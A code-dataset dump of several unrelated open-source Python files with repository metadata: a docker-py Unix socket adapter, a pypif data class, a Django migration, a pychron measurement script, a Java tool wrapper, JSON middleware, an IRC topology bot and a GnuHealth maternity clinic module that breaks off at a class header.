# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import requests.adapters
import socket
if six.PY3:
import http.client as httplib
else:
import httplib
try:
import requests.packages.urllib3 as urllib3
except ImportError:
import urllib3
RecentlyUsedContainer = urllib3._collections.RecentlyUsedContainer
class UnixHTTPConnection(httplib.HTTPConnection, object):
def __init__(self, base_url, unix_socket, timeout=60):
super(UnixHTTPConnection, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.unix_socket = unix_socket
self.timeout = timeout
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect(self.unix_socket)
self.sock = sock
class UnixHTTPConnectionPool(urllib3.connectionpool.HTTPConnectionPool):
def __init__(self, base_url, socket_path, timeout=60):
super(UnixHTTPConnectionPool, self).__init__(
'localhost', timeout=timeout
)
self.base_url = base_url
self.socket_path = socket_path
self.timeout = timeout
def _new_conn(self):
return UnixHTTPConnection(self.base_url, self.socket_path,
self.timeout)
class UnixAdapter(requests.adapters.HTTPAdapter):
def __init__(self, socket_url, timeout=60):
socket_path = socket_url.replace('http+unix://', '')
if not socket_path.startswith('/'):
socket_path = '/' + socket_path
self.socket_path = socket_path
self.timeout = timeout
self.pools = RecentlyUsedContainer(10,
dispose_func=lambda p: p.close())
super(UnixAdapter, self).__init__()
def get_connection(self, url, proxies=None):
with self.pools.lock:
pool = self.pools.get(url)
if pool:
return pool
pool = UnixHTTPConnectionPool(
url, self.socket_path, self.timeout
)
self.pools[url] = pool
return pool
def request_url(self, request, proxies):
# The select_proxy utility in requests errors out when the provided URL
# doesn't have a hostname, like is the case when using a UNIX socket.
# Since proxies are an irrelevant notion in the case of UNIX sockets
# anyway, we simply return the path URL directly.
# See also: https://github.com/docker/docker-py/issues/811
return request.path_url
def close(self):
self.pools.clear()
|
shakamunyi/docker-py
|
docker/unixconn/unixconn.py
|
Python
|
apache-2.0
| 3,189 | 0 |
from six import string_types
from pypif.obj.common.pio import Pio
class Instrument(Pio):
"""
Information about an instrument used to take a measurement.
"""
def __init__(self, name=None, model=None, producer=None, url=None, tags=None, **kwargs):
"""
Constructor.
:param name: String with the name of the instrument.
:param model: String with the model of the instrument.
:param producer: String with the name of the producer of the instrument.
:param url: URL to the instrument website.
:param tags: List of strings or numbers that are tags for this object.
:param kwargs: Dictionary of fields that are not supported.
"""
super(Instrument, self).__init__(tags=tags, **kwargs)
self._name = None
self.name = name
self._model = None
self.model = model
self._producer = None
self.producer = producer
self._url = None
self.url = url
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._validate_type('name', name, string_types)
self._name = name
@name.deleter
def name(self):
self._name = None
@property
def model(self):
return self._model
@model.setter
def model(self, model):
self._validate_type('model', model, string_types)
self._model = model
@model.deleter
def model(self):
self._model = None
@property
def producer(self):
return self._producer
@producer.setter
def producer(self, producer):
self._validate_type('producer', producer, string_types)
self._producer = producer
@producer.deleter
def producer(self):
self._producer = None
@property
def url(self):
return self._url
@url.setter
def url(self, url):
self._validate_type('url', url, string_types)
self._url = url
@url.deleter
def url(self):
self._url = None
|
CitrineInformatics/pypif
|
pypif/obj/common/instrument.py
|
Python
|
apache-2.0
| 2,048 | 0.000977 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2019-12-13 07:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('programs', '0012_auto_20170419_0018'),
]
operations = [
migrations.CreateModel(
name='CustomProgramsConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),
('enabled', models.BooleanField(default=False, verbose_name='Enabled')),
('arguments', models.TextField(blank=True, default='', help_text='Useful for manually running a Jenkins job. Specify like "--usernames A B --program-uuids X Y".')),
('changed_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, verbose_name='Changed by')),
],
options={
'verbose_name': 'backpopulate_program_credentials argument',
},
),
]
|
stvstnfrd/edx-platform
|
openedx/core/djangoapps/programs/migrations/0013_customprogramsconfig.py
|
Python
|
agpl-3.0
| 1,294 | 0.003864 |
#!Measurement
'''
baseline:
after: true
before: false
counts: 180
detector: H1
mass: 34.2
settling_time: 20.0
default_fits: nominal
equilibration:
eqtime: 1.0
inlet: R
inlet_delay: 3
outlet: O
use_extraction_eqtime: true
post_equilibration_delay: 5
multicollect:
counts: 600
detector: H1
isotope: Ar40
peakcenter:
after: true
before: false
detector: H1
detectors:
- H1
- AX
- L2
- CDD
integration_time: 0.262144
isotope: Ar40
peakhop:
generate_ic_table: false
hops_name: ''
ncycles: 0
use_peak_hop: false
'''
ACTIVE_DETECTORS=('H2','H1','AX','L1','L2','CDD')
def main():
info('unknown measurement script')
set_deflection('CDD', 400)
activate_detectors(*ACTIVE_DETECTORS)
if mx.peakcenter.before:
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope)
if mx.baseline.before:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
position_magnet(mx.multicollect.isotope, detector=mx.multicollect.detector)
#sniff the gas during equilibration
if mx.equilibration.use_extraction_eqtime:
eqt = eqtime
else:
eqt = mx.equilibration.eqtime
'''
Equilibrate is non-blocking so use a sniff or sleep as a placeholder
e.g sniff(<equilibration_time>) or sleep(<equilibration_time>)
'''
equilibrate(eqtime=eqt, inlet=mx.equilibration.inlet, outlet=mx.equilibration.outlet,
delay=mx.equilibration.inlet_delay)
set_time_zero()
sniff(eqt)
set_fits()
set_baseline_fits()
# delay to migitate 39Ar spike from inlet valve close
sleep(mx.equilibration.post_equilibration_delay)
#multicollect on active detectors
multicollect(ncounts=mx.multicollect.counts, integration_time=1)
if mx.baseline.after:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
if mx.peakcenter.after:
activate_detectors(*mx.peakcenter.detectors, **{'peak_center':True})
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope,
integration_time=mx.peakcenter.integration_time)
if use_cdd_warming:
gosub('warm_cdd', argv=(mx.equilibration.outlet,))
set_deflection('CDD', 50)
info('finished measure script')
|
USGSDenverPychron/pychron
|
docs/user_guide/operation/scripts/examples/argus/measurement/jan_unknown_air_for_38Ar_600_180.py
|
Python
|
apache-2.0
| 2,496 | 0.014824 |
#
# author: Cosmin Basca
#
# Copyright 2010 University of Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import signal
from subprocess import Popen, PIPE, STDOUT, call
from threading import Thread
from natsort import natsorted
__author__ = 'basca'
__LIB_NAME__ = 'jvmrdftools-assembly-'
__LIB__ = os.path.join(os.path.dirname(os.path.realpath(__file__)), "lib")
__JARS__ = natsorted([(jar.replace(__LIB_NAME__, "").replace(".jar", ""),
os.path.join(__LIB__, jar))
for jar in os.listdir(__LIB__) if jar.startswith(__LIB_NAME__)],
key=lambda (ver, jar_file): ver)
def latest_jar():
global __JARS__
return __JARS__[-1]
class JavaNotFoundException(Exception):
pass
DEVNULL = open(os.devnull, 'w')
XMS = 128
XMX = 2048
def check_java(message=""):
if call(['java', '-version'], stderr=DEVNULL) != 0:
raise JavaNotFoundException(
'Java is not installed in the system path. {0}'.format(message))
def run_tool(main_class, xms=XMS, xmx=XMX, *options):
latest_version, jar_path = latest_jar()
command = ["java", "-Xms{0}m".format(xms), "-Xmx{0}m".format(xmx), "-classpath", jar_path, main_class] + \
[str(opt) for opt in options]
# call(command, stdout=PIPE, stdin=PIPE, stderr=STDOUT, preexec_fn=os.setsid)
call(command)
# ----------------------------------------------------------------------------------------------------------------------
#
# the specific tools
#
# ----------------------------------------------------------------------------------------------------------------------
def run_lubm_generator(num_universities, index, generator_seed, ontology, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.LubmGenerator",
xms, xmx,
"--num_universities", num_universities,
"--start_index", index,
"--seed", generator_seed,
"--ontology", ontology,
"--output_path", output_path)
def run_nxvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.NxVoidGenerator",
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_jvmvoid_generator(source, dataset_id, output_path, xms=XMS, xmx=XMX):
run_tool("com.rdftools.VoIDGenerator",
xms, xmx,
"--source", source,
"--dataset_id", dataset_id,
"--output_path", output_path)
def run_rdf2rdf_converter(source, destination, xms=XMS, xmx=XMX):
run_tool("com.rdftools.Rdf2RdfConverter",
xms, xmx,
source, destination)
|
cosminbasca/rdftools
|
rdftools/tools/jvmrdftools/__init__.py
|
Python
|
apache-2.0
| 3,224 | 0.001861 |
import json
from django import http
from django.conf import settings
from rmr.types import JsonDict
class RequestDecoder:
content_type = 'application/json'
allowed_methods = {
'POST', 'PUT', 'PATCH',
}
def process_request(self, request):
if request.method not in self.allowed_methods:
return
content_type = request.META.get('CONTENT_TYPE', '')
if not content_type.startswith(self.content_type):
return
encoding = request.encoding or settings.DEFAULT_CHARSET
try:
body = request.body.decode(encoding=encoding)
except UnicodeDecodeError:
return http.HttpResponseBadRequest('bad unicode')
try:
request.POST = self.json_decode(body)
except ValueError:
return http.HttpResponseBadRequest('malformed data')
@staticmethod
def json_decode(body):
data = json.loads(body)
if not isinstance(data, dict):
# all data of type other then dict will be returned as is
return data
return JsonDict(data)
|
RedMadRobot/rmr_django
|
rmr/middleware/json.py
|
Python
|
mit
| 1,109 | 0 |
#!/usr/bin/python
"""
Copyright 2012
Anton Zering <synth@lostprofile.de>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
try:
import yapgvb
import irclib
except:
print "Some dependencies could not been fulfilled. Exiting."
sys.exit(0)
SERVER = ("efnet.portlane.se", 6667)
NICK = "topologybot"
OUTPUT_FILE = "%s_topology.png" % SERVER[0]
def generate_links(links):
""" create a clique of n nodes """
# Create a new undirected graph
graph = yapgvb.Graph('%s-clique' % 10)
nodes = {}
for link in links:
nodes[link[0]] = graph.add_node(label= link[0])
for link in links:
if link[0] == link[1]:
continue
nodes[link[0]] >> nodes[link[1]]
graph.layout(yapgvb.engines.dot)
format = yapgvb.formats.png
filename = OUTPUT_FILE
graph.render(filename)
class IRCCat(irclib.SimpleIRCClient):
def __init__(self):
irclib.SimpleIRCClient.__init__(self)
self.links = []
def on_welcome(self, connection, event):
print "connected, fetching links"
connection.links()
def on_links(self, connection, event):
print event.arguments()
self.links.append(event.arguments())
def on_endoflinks(self, connection, event):
print "rendering"
generate_links(self.links)
connection.disconnect()
def on_disconnect(self, connection, event):
sys.exit(0)
def main():
c = IRCCat()
try:
print "connecting"
c.connect(SERVER[0], SERVER[1], NICK)
except irclib.ServerConnectionError, x:
print x
sys.exit(1)
c.start()
if __name__ == "__main__":
main()
|
synthomat/irc_topology_drawer
|
irc_topology_drawer.py
|
Python
|
apache-2.0
| 2,147 | 0.01211 |
# -------------------------------------------------------------------------------
# mmc.py
#
# Customization of GnuHealth for the needs of Mercy Maternity Clinic, Inc.
# -------------------------------------------------------------------------------
from trytond.model import ModelView, ModelSingleton, ModelSQL, fields
from trytond.pyson import Eval, Not, Bool, Or, And
from trytond.pool import Pool
import datetime
import logging
__all__ = [
'MmcReports',
'MmcSequences',
'MmcPatientData',
'MmcPatientDiseaseInfo',
'MmcVaccination',
'MmcPatientMedication',
'MmcMedicationTemplate',
'MmcPatientPregnancy',
'MmcPrenatalEvaluation',
'MmcPerinatal',
'MmcPerinatalMonitor',
'MmcPuerperiumMonitor',
'Address',
'MmcPostpartumContinuedMonitor',
'MmcPostpartumOngoingMonitor',
]
mmcLog = logging.getLogger('mmc')
def month_num_to_abbrev(num):
mon = {}
mon['01'] = 'Jan'
mon['02'] = 'Feb'
mon['03'] = 'Mar'
mon['04'] = 'Apr'
mon['05'] = 'May'
mon['06'] = 'Jun'
mon['07'] = 'Jul'
mon['08'] = 'Aug'
mon['09'] = 'Sep'
mon['10'] = 'Oct'
mon['11'] = 'Nov'
mon['12'] = 'Dec'
return mon[num]
class MmcReports(ModelSingleton, ModelSQL, ModelView):
'Class for custom reports'
__name__ = 'mmc.reports'
class MmcSequences(ModelSingleton, ModelSQL, ModelView):
"Sequences for MMC"
__name__ = "mmc.sequences"
doh_sequence = fields.Property(fields.Many2One('ir.sequence',
'DOH Sequence', domain=[('code', '=', 'mmc.doh')],
required=True))
class MmcPatientData(ModelSQL, ModelView):
'Patient related information'
__name__ = 'gnuhealth.patient'
# --------------------------------------------------------
# Hide these fields
# --------------------------------------------------------
family = fields.Many2One('gnuhealth.family', 'x',
states={'invisible': True})
primary_care_doctor = fields.Many2One('gnuhealth.physician', 'x',
states={'invisible': True})
current_insurance = fields.Many2One('gnuhealth.insurance', 'x',
states={'invisible': True})
# --------------------------------------------------------
# Expand the selection list of these fields.
# --------------------------------------------------------
marital_status = fields.Function(
fields.Selection([
(None, ''),
('l', 'Live-in'),
('s', 'Single'),
('m', 'Married'),
('c', 'Concubinage'),
('w', 'Widowed'),
('d', 'Divorced'),
('x', 'Separated'),
], 'Marital Status', sort=False), 'get_patient_marital_status')
rh = fields.Selection([
('u', 'Unknown'),
('+', '+'),
('-', '-'),
], 'Rh')
# --------------------------------------------------------
# Change the label on these fields.
# --------------------------------------------------------
diseases = fields.One2Many('gnuhealth.patient.disease', 'name', 'Condition')
gravida = fields.Integer ('G', required=True)
abortions = fields.Integer('A')
stillbirths = fields.Integer('S')
# --------------------------------------------------------
# Add Pregnancy fields.
# --------------------------------------------------------
living = fields.Integer('L') # number of live births
para = fields.Integer('P') # number of times given birth
term = fields.Integer('Term') # number of pregnancies to full term
preterm = fields.Integer('Preterm') # number of pregnancies not to full term
# --------------------------------------------------------
# Add Phil Health related fields.
# --------------------------------------------------------
phil_health = fields.Boolean('Phil Health',
help='Mark if the patient has Phil Health')
phil_health_mcp = fields.Boolean('MCP',
help="If MCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_ncp = fields.Boolean('NCP',
help="If NCP applies",
states={'invisible': Not(Bool(Eval('phil_health')))},
depends=['phil_health'])
phil_health_id = fields.Char('PHIC#',
size=14,
help="The patients Phil Health ID number",
states={
'invisible': Not(Bool(Eval('phil_health'))),
'required': Bool(Eval('phil_health'))
},
on_change=['phil_health_id'],
depends=['phil_health'])
# --------------------------------------------------------
# Add new screening related fields.
# --------------------------------------------------------
gram_stain = fields.Boolean('Gram Stain',
help="Check if gram stain was done")
breast_self_exam_taught = fields.Boolean('Taught breast self exam',
help="Check if patient has been taught how to do breast self exams")
# --------------------------------------------------------
# Department of Health required id (aka MMC ID#).
# --------------------------------------------------------
doh_id = fields.Char('MMC ID',
size=8,
help="Dept of Health id", required=False,
select=True, on_change=['doh_id'])
# --------------------------------------------------------
# Format DOH ID # in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_doh_id(self):
origFld = self.doh_id
doh = origFld.replace('-', '')
val = origFld
if ((len(doh) == 6) and (doh.isdigit())):
val = "{0}-{1}-{2}".format(doh[:2], doh[2:4], doh[4:6])
return {'doh_id': val}
# --------------------------------------------------------
# Format PHIC# in the customary fashion after the user
# types it in. User can type with hyphens or not. But don't
# change anything unless the field seems correct.
# --------------------------------------------------------
def on_change_phil_health_id(self):
origFld = self.phil_health_id
phic = origFld.replace('-', '')
val = origFld
if ((len(phic) == 12) and (phic.isdigit())):
val = "{0}-{1}-{2}".format(phic[:2], phic[2:11], phic[-1])
return {'phil_health_id': val}
# --------------------------------------------------------
# Validate the DOH ID.
# --------------------------------------------------------
@staticmethod
def validate_doh_id(ids):
for patientData in ids:
if (patientData.doh_id == None or len(patientData.doh_id) == 0):
return True
doh = patientData.doh_id.replace('-', '')
if (len(doh) != 6):
return False
if (not doh.isdigit()):
return False
return True
# --------------------------------------------------------
# Validate the PHIC #.
# --------------------------------------------------------
@staticmethod
def validate_phil_health_id(ids):
for patientData in ids:
if not patientData.phil_health:
# if Phil Health does not apply, then we are fine.
return True
phic = patientData.phil_health_id.replace('-', '')
if (len(phic) != 12):
mmcLog.info('Phil Health id is not the correct length')
return False
if (not phic.isdigit()):
mmcLog.info('Phil Health id is not a number')
return False
return True
# --------------------------------------------------------
# Set a reasonable default sex for a maternity clinic.
# --------------------------------------------------------
@staticmethod
def default_sex():
return 'f'
# --------------------------------------------------------
# 99.4% of all people in the Philippines are RH positive.
# Oftentimes blood tests do not even test for this. But
# because it is not tested for sometimes, it should be
# set to unknown unless explicitly set.
# --------------------------------------------------------
@staticmethod
def default_rh():
return 'u'
# --------------------------------------------------------
# Add our validations to the class.
# --------------------------------------------------------
@classmethod
def __setup__(cls):
super(MmcPatientData, cls).__setup__()
cls._sql_constraints = [
('name_uniq', 'UNIQUE(name)', 'The Patient already exists !'),
('doh_uniq', 'UNIQUE(doh_id)', 'The MMC ID already exists !'),
]
cls._constraints += [
('validate_phil_health_id', 'phil_health_id_format'),
('validate_doh_id', 'validate_doh_id_format'),
]
cls._error_messages.update({
'phil_health_id_format': 'PHIC# must be 12 numbers',
'validate_doh_id_format': 'Department of Health ID must be 6 numbers'
})
# --------------------------------------------------------
# Create a Department of Health id automatically, but it
# can be overridden by the user, if desired, to another
# number or a blank value.
# --------------------------------------------------------
@classmethod
def create(cls, vlist):
sequence_obj = Pool().get('ir.sequence')
config_obj = Pool().get('mmc.sequences')
vlist = [x.copy() for x in vlist]
for values in vlist:
if not values.get('doh_id'):
config = config_obj(1)
# --------------------------------------------------------
# The sequence is prefixed with the current 4 digit year
# but we need only a two digit year and we like it formatted
# a certain way.
# --------------------------------------------------------
seq = sequence_obj.get_id(config.doh_sequence.id)[2:]
values['doh_id'] = "{0}-{1}-{2}".format(seq[:2], seq[2:4], seq[4:6])
return super(MmcPatientData, cls).create(vlist)
class MmcPatientDiseaseInfo(ModelSQL, ModelView):
'Patient Disease History'
__name__ = 'gnuhealth.patient.disease'
# --------------------------------------------------------
# Change the label of these fields.
# --------------------------------------------------------
pathology = fields.Many2One('gnuhealth.pathology', 'Condition',
required=True, help='Disease')
status = fields.Selection([
('a', 'acute'),
('c', 'chronic'),
('u', 'unchanged'),
('h', 'healed'),
('i', 'improving'),
('w', 'worsening'),
], 'Status of the condition', select=True, sort=False)
is_infectious = fields.Boolean('Infectious Condition',
help='Check if the patient has an infectious / transmissible condition')
is_active = fields.Boolean('Active condition')
class MmcVaccination(ModelSQL, ModelView):
'Patient Vaccination information'
__name__ = 'gnuhealth.vaccination'
# --------------------------------------------------------
# Was the vaccine administered by MMC?
# --------------------------------------------------------
vaccine_by_mmc = fields.Boolean('Administered by MMC',
help="Check if this vaccine was administered by Mercy Maternity Clinic")
# --------------------------------------------------------
# Hide these unnecessary fields.
# --------------------------------------------------------
vaccine_expiration_date = fields.Date('x', states={'invisible': True})
vaccine_lot = fields.Char('x', states={'invisible': True})
institution = fields.Many2One('party.party', 'x', states={'invisible': True})
date = fields.DateTime('Date', states={'invisible': True})
next_dose_date = fields.DateTime('Next Dose', states={'invisible': True})
# --------------------------------------------------------
# Allow approximate dates for recording of historical
# vaccinations per patient testimony.
# --------------------------------------------------------
cdate_month = fields.Selection([
('', ''),
('01', 'Jan'),
('02', 'Feb'),
('03', 'Mar'),
('04', 'Apr'),
('05', 'May'),
('06', 'Jun'),
('07', 'Jul'),
('08', 'Aug'),
('09', 'Sep'),
('10', 'Oct'),
('11', 'Nov'),
('12', 'Dec'),
], 'Approximate Month', help="Approximate month of the vaccination",
sort=False)
cdate_year = fields.Integer('Approximate Year (YYYY)',
help="Year of the vaccination")
# --------------------------------------------------------
# But also allow an exact date if known or vaccination is
# being administered.
# --------------------------------------------------------
cdate = fields.Date('Date',
states={
'invisible': Or(Bool(Eval('cdate_year')), And(Bool(Eval('cdate_month')),
Bool(Eval('cdate_year'))))
})
next_dose = fields.Date('Next Dose')
# --------------------------------------------------------
# Display date for tree view that shows appropriate date
# no matter if cdate or cdate_year or cdate_month and
# cdate_year chosen.
# --------------------------------------------------------
display_date = fields.Function(fields.Char('Date'), 'get_display_date')
# --------------------------------------------------------
# Choose either cdate or the cdate_month and/or cdate_year
# fields to create an appropriate display.
# --------------------------------------------------------
@staticmethod
def get_display_date(ids, name):
result = {}
for vacc in ids:
if name == 'display_date':
if vacc.cdate_year is not None and (vacc.cdate_month is None or
len(vacc.cdate_month) == 0):
result[vacc.id] = "{0}".format(vacc.cdate_year)
elif vacc.cdate_year != None and vacc.cdate_month != None and vacc.cdate_month != '':
result[vacc.id] = "{0} {1}".format(month_num_to_abbrev(vacc.cdate_month), vacc.cdate_year)
else:
result[vacc.id] = "{0}".format(vacc.cdate)
return result
# --------------------------------------------------------
# Revise validation to not require the next_dose_date field.
# --------------------------------------------------------
@staticmethod
def validate_next_dose_date (ids):
for vaccine_data in ids:
if vaccine_data.next_dose_date is None:
return True
if (vaccine_data.next_dose_date < vaccine_data.date):
return False
else:
return True
@staticmethod
def default_cdate():
return datetime.datetime.now()
@staticmethod
def default_cdate_month():
return ''
@staticmethod
def default_cdate_year():
return None
class MmcPatientMedication(ModelSQL, ModelView):
'Patient Medication'
__name__ = 'gnuhealth.patient.medication'
# --------------------------------------------------------
# Change the field label.
# --------------------------------------------------------
doctor = fields.Many2One('gnuhealth.physician', 'Name',
help='Name of person who prescribed the medicament')
class MmcMedicationTemplate(ModelSQL, ModelView):
'Template for medication'
__name__ = 'gnuhealth.medication.template'
# --------------------------------------------------------
# Change the field label.
# --------------------------------------------------------
medicament = fields.Many2One('gnuhealth.medicament', 'Name of Med',
required=True, help='Prescribed Medicine')
class MmcPatientPregnancy(ModelSQL, ModelView):
'Patient Pregnancy'
__name__ = 'gnuhealth.patient.pregnancy'
# --------------------------------------------------------
# Change the field labels.
# --------------------------------------------------------
pdd = fields.Function (fields.Date('Due Date'), 'get_pregnancy_data')
perinatal = fields.One2Many('gnuhealth.perinatal', 'name', 'Labor')
puerperium_monitor = fields.One2Many('gnuhealth.puerperium.monitor',
'name', 'Postpartum')
pregnancy_end_date = fields.DateTime ('Date/time of birth',
states={
'invisible': Bool(Eval('current_pregnancy')),
'required': Not(Bool(Eval('current_pregnancy'))),
})
# --------------------------------------------------------
# Add an alternative due date field.
# --------------------------------------------------------
apdd = fields.Date('Alt Due Date',
help="Enter the alternative pregnancy due date if there is one")
# --------------------------------------------------------
# Add partner information for this pregnancy.
# --------------------------------------------------------
partner_first_name = fields.Char('Partner first name',
help="The partner or husband's first name")
partner_last_name = fields.Char('Partner last name',
help="The partner or husband's last name")
partner_age = fields.Integer('Partner age',
help="The age in years of the partner")
partner_employment = fields.Char('Partner work',
help="The work of the partner")
partner_education = fields.Char('Partner education',
help="The amount of education that the partner has completed")
partner_income = fields.Integer('Partner income',
help="The amount of pesos per month the partner earns")
patient_income = fields.Integer('Patient income',
help="The amount of pesos per month the patient earns")
# --------------------------------------------------------
# Add fields for the immediate postpartum stage. These are
# summary fields, ie. they are summarized from the charts.
# --------------------------------------------------------
pp_immed_cr_high = fields.Integer('High CR')
pp_immed_cr_low = fields.Integer('Low CR')
pp_immed_fundus_desc = fields.Char('Fundus Desc', size=30, help="Fundus description")
pp_immed_ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
pp_immed_comments = fields.Char('Comments', size=100, help="Comments")
# --------------------------------------------------------
# Add two new sections for postpartum: continuing and ongoing.
# --------------------------------------------------------
postpartum_continued = fields.One2Many(
'gnuhealth.postpartum.continued.monitor',
'name', 'Postpartum Continued Monitor')
postpartum_ongoing = fields.One2Many(
'gnuhealth.postpartum.ongoing.monitor',
'name', 'Postpartum Ongoing Monitor')
# --------------------------------------------------------
# Add doctor/dentist consult date fields.
# --------------------------------------------------------
doctor_consult_date = fields.Date('Dr consult date',
help="The date that the patient consulted a doctor")
dentist_consult_date = fields.Date('Dentist consult date',
help="The date that the patient consulted a dentist")
# --------------------------------------------------------
# Add other miscellaneous fields.
# --------------------------------------------------------
mb_book = fields.Boolean('MB Book', help="Patient has MB Book?")
iodized_salt = fields.Boolean('Iodized Salt', help="Patient uses iodized salt")
where_deliver = fields.Char('Where deliver?', help="Where will patient deliver?")
# --------------------------------------------------------
# We don't use this field, and it is always one because
# by law the lay-in clinic cannot handle multiple births.
# --------------------------------------------------------
@staticmethod
def default_fetuses():
return 1
class MmcPrenatalEvaluation(ModelSQL, ModelView):
'Prenatal and Antenatal Evaluations'
__name__ = 'gnuhealth.patient.prenatal.evaluation'
@staticmethod
def get_patient_evaluation_data(ids, name):
result = {}
for evaluation_data in ids:
if name == 'gestational_weeks':
gestational_age = datetime.datetime.date(evaluation_data.evaluation_date) - evaluation_data.name.lmp
result[evaluation_data.id] = (gestational_age.days)/7
if name == 'gestational_days':
gestational_age = datetime.datetime.date(evaluation_data.evaluation_date) - evaluation_data.name.lmp
result[evaluation_data.id] = gestational_age.days
if name == 'gestational_age':
gestational_age = datetime.datetime.date(evaluation_data.evaluation_date) - evaluation_data.name.lmp
result[evaluation_data.id] = "{0} {1}/7".format((gestational_age.days)/7, (gestational_age.days)%7)
if name == 'bp':
result[evaluation_data.id] = "{0}/{1}".format(evaluation_data.systolic, evaluation_data.diastolic)
if name == 'eval_date_only':
result[evaluation_data.id] = datetime.datetime.date(evaluation_data.evaluation_date)
return result
# --------------------------------------------------------
# Change the field labels.
# --------------------------------------------------------
evaluation_date = fields.DateTime('Admission', required=True)
fetus_heart_rate = fields.Integer('FHT', help="Fetus heart rate")
fundal_height = fields.Integer('FH',
help="Distance between the symphysis pubis and the uterine fundus " \
"(S-FD) in cm")
# --------------------------------------------------------
# Add additional fields.
# --------------------------------------------------------
discharge = fields.DateTime('Discharge', help='Time the patient left')
weight = fields.Numeric("Weight (kg)", (3,1), help="Mother's weight in kilos")
systolic = fields.Integer('Systolic Pressure')
diastolic = fields.Integer('Diastolic Pressure')
cr = fields.Integer("CR", help="Mother's heart rate")
rr = fields.Integer("RR", help="Mother's respitory rate")
temperature = fields.Float('Temp (C)', help='Temperature in celcius of the mother')
position = fields.Char("Position", help="Baby's position")
examiner = fields.Char('Examiner', help="Who did the examination?")
next_appt = fields.Date('Next Scheduled Date', help="Date of next prenatal exam")
# --------------------------------------------------------
# Add a gestational_age field. Health_gyneco has two similar
# fields: gestational_weeks and gestational_days. The former
# is only granular to the week, the later to the day. MMC
# staff is used to the GA field being the number of weeks and
# a fractional part with the denominator the number 7, e.g.
# 33 2/7. Our gestational_age field will attempt to get close
# to that.
# --------------------------------------------------------
gestational_age = fields.Function(fields.Char('GA'),
'get_patient_evaluation_data')
# --------------------------------------------------------
# Add a convenience function that displays the blood pressure
# as one field instead of two. Useful for the tree view.
# --------------------------------------------------------
bp = fields.Function(fields.Char('B/P'), 'get_patient_evaluation_data')
# --------------------------------------------------------
# Add a display field for the tree view that only shows the
# admission date and not the time.
# --------------------------------------------------------
eval_date_only = fields.Function(fields.Date('Date'), 'get_patient_evaluation_data')
class MmcPerinatal(ModelSQL, ModelView):
'Perinatal Information'
__name__ = 'gnuhealth.perinatal'
@staticmethod
def get_perinatal_information(ids, name):
result = {}
for perinatal_data in ids:
if name == 'gestational_weeks':
gestational_age = datetime.datetime.date(perinatal_data.admission_date) - perinatal_data.name.lmp
result[perinatal_data.id] = (gestational_age.days)/7
return result
# --------------------------------------------------------
# Change selection list.
# --------------------------------------------------------
start_labor_mode = fields.Selection([
('nsd', 'NSD'),
('o', 'Other'),
], 'Delivery mode', sort=False)
# --------------------------------------------------------
# Placenta delivery fields.
# --------------------------------------------------------
placenta_datetime = fields.DateTime('Placenta delivery')
placenta_expulsion = fields.Selection([
('s', 'Schult'),
('d', 'Duncan'),
], 'Placenta expulsion', sort=False)
placenta_delivery = fields.Selection([
('s', 'Spontaneous'),
('cct', 'CCT'),
('ma', 'Manual Assist'),
('mr', 'Manual Removal'),
], 'Placenta delivery type', sort=False)
placenta_duration = fields.Integer('Duration (min)',
help="Duration of the placenta delivery in minutes")
ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
# --------------------------------------------------------
# Additional intake fields.
# --------------------------------------------------------
begin_labor_intake = fields.DateTime('Labor start')
pos_intake = fields.Char('POS', size=10)
fundal_height_intake = fields.Integer('Fundal Height')
systolic_intake = fields.Integer('Systolic Pressure')
diastolic_intake = fields.Integer('Diastolic Pressure')
cr_intake = fields.Integer("CR", help="Mother's heart rate")
fetus_cr_intake = fields.Integer("FHT", help="Fetus heart rate")
temperature_intake = fields.Float('Temp (C)', help='Temperature in celcius of the mother')
examiner_intake = fields.Char('Examiner', required=True)
class MmcPerinatalMonitor(ModelSQL, ModelView):
'Perinatal Monitor'
__name__ = 'gnuhealth.perinatal.monitor'
